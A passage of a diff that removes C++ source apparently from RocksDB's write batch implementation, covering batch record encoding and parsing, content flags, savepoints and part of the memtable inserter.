-  return WriteBatchInternal::Count(this);
-}
-
-uint32_t WriteBatch::ComputeContentFlags() const {
-  auto rv = content_flags_.load(std::memory_order_relaxed);
-  if ((rv & ContentFlags::DEFERRED) != 0) {
-    BatchContentClassifier classifier;
-    Iterate(&classifier);
-    rv = classifier.content_flags;
-
-    // this method is conceptually const, because it is performing a lazy
-    // computation that doesn't affect the abstract state of the batch.
-    // content_flags_ is marked mutable so that we can perform the
-    // following assignment
-    content_flags_.store(rv, std::memory_order_relaxed);
-  }
-  return rv;
-}
-
-void WriteBatch::MarkWalTerminationPoint() {
-  wal_term_point_.size = GetDataSize();
-  wal_term_point_.count = Count();
-  wal_term_point_.content_flags = content_flags_;
-}
-
-bool WriteBatch::HasPut() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_PUT) != 0;
-}
-
-bool WriteBatch::HasDelete() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_DELETE) != 0;
-}
-
-bool WriteBatch::HasSingleDelete() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_SINGLE_DELETE) != 0;
-}
-
-bool WriteBatch::HasDeleteRange() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_DELETE_RANGE) != 0;
-}
-
-bool WriteBatch::HasMerge() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_MERGE) != 0;
-}
-
-bool ReadKeyFromWriteBatchEntry(Slice* input, Slice* key, bool cf_record) {
-  assert(input != nullptr && key != nullptr);
-  // Skip tag byte
-  input->remove_prefix(1);
-
-  if (cf_record) {
-    // Skip column_family bytes
-    uint32_t cf;
-    if (!GetVarint32(input, &cf)) {
-      return false;
-    }
-  }
-
-  // Extract key
-  return GetLengthPrefixedSlice(input, key);
-}
-
-bool WriteBatch::HasBeginPrepare() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_BEGIN_PREPARE) != 0;
-}
-
-bool WriteBatch::HasEndPrepare() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_END_PREPARE) != 0;
-}
-
-bool WriteBatch::HasCommit() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_COMMIT) != 0;
-}
-
-bool WriteBatch::HasRollback() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_ROLLBACK) != 0;
-}
-
-Status ReadRecordFromWriteBatch(Slice* input, char* tag,
-                                uint32_t* column_family, Slice* key,
-                                Slice* value, Slice* blob, Slice* xid) {
-  assert(key != nullptr && value != nullptr);
-  *tag = (*input)[0];
-  input->remove_prefix(1);
-  *column_family = 0;  // default
-  switch (*tag) {
-    case kTypeColumnFamilyValue:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Put");
-      }
-    // intentional fallthrough
-    case kTypeValue:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch Put");
-      }
-      break;
-    case kTypeColumnFamilyDeletion:
-    case kTypeColumnFamilySingleDeletion:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Delete");
-      }
-    // intentional fallthrough
-    case kTypeDeletion:
-    case kTypeSingleDeletion:
-      if (!GetLengthPrefixedSlice(input, key)) {
-        return Status::Corruption("bad WriteBatch Delete");
-      }
-      break;
-    case kTypeColumnFamilyRangeDeletion:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch DeleteRange");
-      }
-    // intentional fallthrough
-    case kTypeRangeDeletion:
-      // for range delete, "key" is begin_key, "value" is end_key
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch DeleteRange");
-      }
-      break;
-    case kTypeColumnFamilyMerge:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Merge");
-      }
-    // intentional fallthrough
-    case kTypeMerge:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch Merge");
-      }
-      break;
-    case kTypeColumnFamilyBlobIndex:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch BlobIndex");
-      }
-    // intentional fallthrough
-    case kTypeBlobIndex:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch BlobIndex");
-      }
-      break;
-    case kTypeLogData:
-      assert(blob != nullptr);
-      if (!GetLengthPrefixedSlice(input, blob)) {
-        return Status::Corruption("bad WriteBatch Blob");
-      }
-      break;
-    case kTypeNoop:
-    case kTypeBeginPrepareXID:
-      break;
-    case kTypeEndPrepareXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad EndPrepare XID");
-      }
-      break;
-    case kTypeCommitXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad Commit XID");
-      }
-      break;
-    case kTypeRollbackXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad Rollback XID");
-      }
-      break;
-    default:
-      return Status::Corruption("unknown WriteBatch tag");
-  }
-  return Status::OK();
-}
-
-Status WriteBatch::Iterate(Handler* handler) const {
-  Slice input(rep_);
-  if (input.size() < WriteBatchInternal::kHeader) {
-    return Status::Corruption("malformed WriteBatch (too small)");
-  }
-
-  input.remove_prefix(WriteBatchInternal::kHeader);
-  Slice key, value, blob, xid;
-  int found = 0;
-  Status s;
-  while (s.ok() && !input.empty() && handler->Continue()) {
-    char tag = 0;
-    uint32_t column_family = 0;  // default
-
-    s = ReadRecordFromWriteBatch(&input, &tag, &column_family, &key, &value,
-                                 &blob, &xid);
-    if (!s.ok()) {
-      return s;
-    }
-
-    switch (tag) {
-      case kTypeColumnFamilyValue:
-      case kTypeValue:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_PUT));
-        s = handler->PutCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyDeletion:
-      case kTypeDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_DELETE));
-        s = handler->DeleteCF(column_family, key);
-        found++;
-        break;
-      case kTypeColumnFamilySingleDeletion:
-      case kTypeSingleDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_SINGLE_DELETE));
-        s = handler->SingleDeleteCF(column_family, key);
-        found++;
-        break;
-      case kTypeColumnFamilyRangeDeletion:
-      case kTypeRangeDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_DELETE_RANGE));
-        s = handler->DeleteRangeCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyMerge:
-      case kTypeMerge:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_MERGE));
-        s = handler->MergeCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyBlobIndex:
-      case kTypeBlobIndex:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_BLOB_INDEX));
-        s = handler->PutBlobIndexCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeLogData:
-        handler->LogData(blob);
-        break;
-      case kTypeBeginPrepareXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_BEGIN_PREPARE));
-        handler->MarkBeginPrepare();
-        break;
-      case kTypeEndPrepareXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_END_PREPARE));
-        handler->MarkEndPrepare(xid);
-        break;
-      case kTypeCommitXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_COMMIT));
-        handler->MarkCommit(xid);
-        break;
-      case kTypeRollbackXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_ROLLBACK));
-        handler->MarkRollback(xid);
-        break;
-      case kTypeNoop:
-        break;
-      default:
-        return Status::Corruption("unknown WriteBatch tag");
-    }
-  }
-  if (!s.ok()) {
-    return s;
-  }
-  if (found != WriteBatchInternal::Count(this)) {
-    return Status::Corruption("WriteBatch has wrong count");
-  } else {
-    return Status::OK();
-  }
-}
-
-int WriteBatchInternal::Count(const WriteBatch* b) {
-  return DecodeFixed32(b->rep_.data() + 8);
-}
-
-void WriteBatchInternal::SetCount(WriteBatch* b, int n) {
-  EncodeFixed32(&b->rep_[8], n);
-}
-
-SequenceNumber WriteBatchInternal::Sequence(const WriteBatch* b) {
-  return SequenceNumber(DecodeFixed64(b->rep_.data()));
-}
-
-void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) {
-  EncodeFixed64(&b->rep_[0], seq);
-}
-
-size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) {
-  return WriteBatchInternal::kHeader;
-}
-
-Status WriteBatchInternal::Put(WriteBatch* b, uint32_t column_family_id,
-                               const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeValue));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyValue));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(
-      b->content_flags_.load(std::memory_order_relaxed) | ContentFlags::HAS_PUT,
-      std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Put(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) {
-  return WriteBatchInternal::Put(this, GetColumnFamilyID(column_family), key,
-                                 value);
-}
-
-Status WriteBatchInternal::Put(WriteBatch* b, uint32_t column_family_id,
-                               const SliceParts& key, const SliceParts& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeValue));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyValue));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  PutLengthPrefixedSliceParts(&b->rep_, value);
-  b->content_flags_.store(
-      b->content_flags_.load(std::memory_order_relaxed) | ContentFlags::HAS_PUT,
-      std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                       const SliceParts& value) {
-  return WriteBatchInternal::Put(this, GetColumnFamilyID(column_family), key,
-                                 value);
-}
-
-Status WriteBatchInternal::InsertNoop(WriteBatch* b) {
-  b->rep_.push_back(static_cast<char>(kTypeNoop));
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkEndPrepare(WriteBatch* b, const Slice& xid) {
-  // a manually constructed batch can only contain one prepare section
-  assert(b->rep_[12] == static_cast<char>(kTypeNoop));
-
-  // all savepoints up to this point are cleared
-  if (b->save_points_ != nullptr) {
-    while (!b->save_points_->stack.empty()) {
-      b->save_points_->stack.pop();
-    }
-  }
-
-  // rewrite noop as begin marker
-  b->rep_[12] = static_cast<char>(kTypeBeginPrepareXID);
-  b->rep_.push_back(static_cast<char>(kTypeEndPrepareXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_END_PREPARE |
-                              ContentFlags::HAS_BEGIN_PREPARE,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkCommit(WriteBatch* b, const Slice& xid) {
-  b->rep_.push_back(static_cast<char>(kTypeCommitXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_COMMIT,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkRollback(WriteBatch* b, const Slice& xid) {
-  b->rep_.push_back(static_cast<char>(kTypeRollbackXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_ROLLBACK,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::Delete(WriteBatch* b, uint32_t column_family_id,
-                                  const Slice& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Delete(ColumnFamilyHandle* column_family, const Slice& key) {
-  return WriteBatchInternal::Delete(this, GetColumnFamilyID(column_family),
-                                    key);
-}
-
-Status WriteBatchInternal::Delete(WriteBatch* b, uint32_t column_family_id,
-                                  const SliceParts& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Delete(ColumnFamilyHandle* column_family,
-                          const SliceParts& key) {
-  return WriteBatchInternal::Delete(this, GetColumnFamilyID(column_family),
-                                    key);
-}
-
-Status WriteBatchInternal::SingleDelete(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const Slice& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeSingleDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilySingleDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_SINGLE_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::SingleDelete(ColumnFamilyHandle* column_family,
-                                const Slice& key) {
-  return WriteBatchInternal::SingleDelete(
-      this, GetColumnFamilyID(column_family), key);
-}
-
-Status WriteBatchInternal::SingleDelete(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const SliceParts& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeSingleDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilySingleDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_SINGLE_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::SingleDelete(ColumnFamilyHandle* column_family,
-                                const SliceParts& key) {
-  return WriteBatchInternal::SingleDelete(
-      this, GetColumnFamilyID(column_family), key);
-}
-
-Status WriteBatchInternal::DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                                       const Slice& begin_key,
-                                       const Slice& end_key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeRangeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyRangeDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, begin_key);
-  PutLengthPrefixedSlice(&b->rep_, end_key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE_RANGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::DeleteRange(ColumnFamilyHandle* column_family,
-                               const Slice& begin_key, const Slice& end_key) {
-  return WriteBatchInternal::DeleteRange(this, GetColumnFamilyID(column_family),
-                                         begin_key, end_key);
-}
-
-Status WriteBatchInternal::DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                                       const SliceParts& begin_key,
-                                       const SliceParts& end_key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeRangeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyRangeDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, begin_key);
-  PutLengthPrefixedSliceParts(&b->rep_, end_key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE_RANGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::DeleteRange(ColumnFamilyHandle* column_family,
-                               const SliceParts& begin_key,
-                               const SliceParts& end_key) {
-  return WriteBatchInternal::DeleteRange(this, GetColumnFamilyID(column_family),
-                                         begin_key, end_key);
-}
-
-Status WriteBatchInternal::Merge(WriteBatch* b, uint32_t column_family_id,
-                                 const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeMerge));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyMerge));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_MERGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                         const Slice& value) {
-  return WriteBatchInternal::Merge(this, GetColumnFamilyID(column_family), key,
-                                   value);
-}
-
-Status WriteBatchInternal::Merge(WriteBatch* b, uint32_t column_family_id,
-                                 const SliceParts& key,
-                                 const SliceParts& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeMerge));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyMerge));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  PutLengthPrefixedSliceParts(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_MERGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Merge(ColumnFamilyHandle* column_family,
-                         const SliceParts& key, const SliceParts& value) {
-  return WriteBatchInternal::Merge(this, GetColumnFamilyID(column_family), key,
-                                   value);
-}
-
-Status WriteBatchInternal::PutBlobIndex(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeBlobIndex));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyBlobIndex));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_BLOB_INDEX,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::PutLogData(const Slice& blob) {
-  LocalSavePoint save(this);
-  rep_.push_back(static_cast<char>(kTypeLogData));
-  PutLengthPrefixedSlice(&rep_, blob);
-  return save.commit();
-}
-
-void WriteBatch::SetSavePoint() {
-  if (save_points_ == nullptr) {
-    save_points_ = new SavePoints();
-  }
-  // Record length and count of current batch of writes.
-  save_points_->stack.push(SavePoint(
-      GetDataSize(), Count(), content_flags_.load(std::memory_order_relaxed)));
-}
-
-Status WriteBatch::RollbackToSavePoint() {
-  if (save_points_ == nullptr || save_points_->stack.size() == 0) {
-    return Status::NotFound();
-  }
-
-  // Pop the most recent savepoint off the stack
-  SavePoint savepoint = save_points_->stack.top();
-  save_points_->stack.pop();
-
-  assert(savepoint.size <= rep_.size());
-  assert(savepoint.count <= Count());
-
-  if (savepoint.size == rep_.size()) {
-    // No changes to rollback
-  } else if (savepoint.size == 0) {
-    // Rollback everything
-    Clear();
-  } else {
-    rep_.resize(savepoint.size);
-    WriteBatchInternal::SetCount(this, savepoint.count);
-    content_flags_.store(savepoint.content_flags, std::memory_order_relaxed);
-  }
-
-  return Status::OK();
-}
-
-Status WriteBatch::PopSavePoint() {
-  if (save_points_ == nullptr || save_points_->stack.size() == 0) {
-    return Status::NotFound();
-  }
-
-  // Pop the most recent savepoint off the stack
-  save_points_->stack.pop();
-
-  return Status::OK();
-}
-
-class MemTableInserter : public WriteBatch::Handler {
-
-  SequenceNumber sequence_;
-  ColumnFamilyMemTables* const cf_mems_;
-  FlushScheduler* const flush_scheduler_;
-  const bool ignore_missing_column_families_;
-  const uint64_t recovering_log_number_;
-  // log number that all Memtables inserted into should reference
-  uint64_t log_number_ref_;
-  DBImpl* db_;
-  const bool concurrent_memtable_writes_;
-  bool       post_info_created_;
-
-  bool* has_valid_writes_;
-  // On some (!) platforms just default creating
-  // a map is too expensive in the Write() path as they
-  // cause memory allocations though unused.
-  // Make creation optional but do not incur
-  // unique_ptr additional allocation
-  using 
-  MemPostInfoMap = std::map<MemTable*, MemTablePostProcessInfo>;
-  using
-  PostMapType = std::aligned_storage<sizeof(MemPostInfoMap)>::type;
-  PostMapType mem_post_info_map_;
-  // current recovered transaction we are rebuilding (recovery)
-  WriteBatch* rebuilding_trx_;
-
-  MemPostInfoMap& GetPostMap() {
-    assert(concurrent_memtable_writes_);
-    if(!post_info_created_) {
-      new (&mem_post_info_map_) MemPostInfoMap();
-      post_info_created_ = true;
-    }
-    return *reinterpret_cast<MemPostInfoMap*>(&mem_post_info_map_);
-  }
-
-public:
-  // cf_mems should not be shared with concurrent inserters
- MemTableInserter(SequenceNumber _sequence, ColumnFamilyMemTables* cf_mems,
-                  FlushScheduler* flush_scheduler,
-                  bool ignore_missing_column_families,
-                  uint64_t recovering_log_number, DB* db,
-                  bool concurrent_memtable_writes,
-                  bool* has_valid_writes = nullptr)
-     : sequence_(_sequence),
-       cf_mems_(cf_mems),
-       flush_scheduler_(flush_scheduler),
-       ignore_missing_column_families_(ignore_missing_column_families),
-       recovering_log_number_(recovering_log_number),
-       log_number_ref_(0),
-       db_(reinterpret_cast<DBImpl*>(db)),
-       concurrent_memtable_writes_(concurrent_memtable_writes),
-       post_info_created_(false),
-       has_valid_writes_(has_valid_writes),
-       rebuilding_trx_(nullptr) {
-   assert(cf_mems_);
-  }
-
-  ~MemTableInserter() {
-    if (post_info_created_) {
-      reinterpret_cast<MemPostInfoMap*>
-        (&mem_post_info_map_)->~MemPostInfoMap();
-    }
-  }
-
-  MemTableInserter(const MemTableInserter&) = delete;
-  MemTableInserter& operator=(const MemTableInserter&) = delete;
-
-  void set_log_number_ref(uint64_t log) { log_number_ref_ = log; }
-
-  SequenceNumber sequence() const { return sequence_; }
-
-  void PostProcess() {
-    assert(concurrent_memtable_writes_);
-    // If post info was not created there is nothing
-    // to process and no need to create on demand
-    if(post_info_created_) {
-      for (auto& pair : GetPostMap()) {
-        pair.first->BatchPostProcess(pair.second);
-      }
-    }
-  }
-
-  bool SeekToColumnFamily(uint32_t column_family_id, Status* s) {
-    // If we are in a concurrent mode, it is the caller's responsibility
-    // to clone the original ColumnFamilyMemTables so that each thread
-    // has its own instance.  Otherwise, it must be guaranteed that there
-    // is no concurrent access
-    bool found = cf_mems_->Seek(column_family_id);
-    if (!found) {
-      if (ignore_missing_column_families_) {
-        *s = Status::OK();
-      } else {
-        *s = Status::InvalidArgument(
-            "Invalid column family specified in write batch");
-      }
-      return false;
-    }
-    if (recovering_log_number_ != 0 &&
-        recovering_log_number_ < cf_mems_->GetLogNumber()) {
-      // This is true only in recovery environment (recovering_log_number_ is
-      // always 0 in
-      // non-recovery, regular write code-path)
-      // * If recovering_log_number_ < cf_mems_->GetLogNumber(), this means that
-      // column
-      // family already contains updates from this log. We can't apply updates
-      // twice because of update-in-place or merge workloads -- ignore the
-      // update
-      *s = Status::OK();
-      return false;
-    }
-
-    if (has_valid_writes_ != nullptr) {
-      *has_valid_writes_ = true;
-    }
-
-    if (log_number_ref_ > 0) {
-      cf_mems_->GetMemTable()->RefLogContainingPrepSection(log_number_ref_);
-    }
-
-    return true;
-  }
-
-  Status PutCFImpl(uint32_t column_family_id, const Slice& key,
-                   const Slice& value, ValueType value_type) {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Put(rebuilding_trx_, column_family_id, key, value);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    MemTable* mem = cf_mems_->GetMemTable();
-    auto* moptions = mem->GetImmutableMemTableOptions();
-    if (!moptions->inplace_update_support) {
-      mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_,
-               get_post_process_info(mem));
-    } else if (moptions->inplace_callback == nullptr) {
-      assert(!concurrent_memtable_writes_);
-      mem->Update(sequence_, key, value);
-      RecordTick(moptions->statistics, NUMBER_KEYS_UPDATED);
-    } else {
-      assert(!concurrent_memtable_writes_);
-      if (mem->UpdateCallback(sequence_, key, value)) {
-      } else {
-        // key not found in memtable. Do sst get, update, add
-        SnapshotImpl read_from_snapshot;
-        read_from_snapshot.number_ = sequence_;
-        ReadOptions ropts;
-        ropts.snapshot = &read_from_snapshot;
-
-        std::string prev_value;
-        std::string merged_value;
-
-        auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-        Status s = Status::NotSupported();
-        if (db_ != nullptr && recovering_log_number_ == 0) {
-          if (cf_handle == nullptr) {
-            cf_handle = db_->DefaultColumnFamily();
-          }
-          s = db_->Get(ropts, cf_handle, key, &prev_value);
-        }
-
-        char* prev_buffer = const_cast<char*>(prev_value.c_str());
-        uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-        auto status = moptions->inplace_callback(s.ok() ? prev_buffer : nullptr,
-                                                 s.ok() ? &prev_size : nullptr,
-                                                 value, &merged_value);
-        if (status == UpdateStatus::UPDATED_INPLACE) {
-          // prev_value is updated in-place with final value.
-          mem->Add(sequence_, value_type, key, Slice(prev_buffer, prev_size));
-          RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN);
-        } else if (status == UpdateStatus::UPDATED) {
-          // merged_value contains the final value.
-          mem->Add(sequence_, value_type, key, Slice(merged_value));
-          RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN);
-        }
-      }
-    }
-    // Since all Puts are logged in trasaction logs (if enabled), always bump
-    // sequence number. Even if the update eventually fails and does not result
-    // in memtable add/update.
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) override {
-    return PutCFImpl(column_family_id, key, value, kTypeValue);
-  }
-
-  Status DeleteImpl(uint32_t column_family_id, const Slice& key,
-                    const Slice& value, ValueType delete_type) {
-    MemTable* mem = cf_mems_->GetMemTable();
-    mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_,
-             get_post_process_info(mem));
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status DeleteCF(uint32_t column_family_id,
-                          const Slice& key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Delete(rebuilding_trx_, column_family_id, key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    return DeleteImpl(column_family_id, key, Slice(), kTypeDeletion);
-  }
-
-  virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                const Slice& key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::SingleDelete(rebuilding_trx_, column_family_id, key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    return DeleteImpl(column_family_id, key, Slice(), kTypeSingleDeletion);
-  }
-
-  virtual Status DeleteRangeCF(uint32_t column_family_id,
-                               const Slice& begin_key,
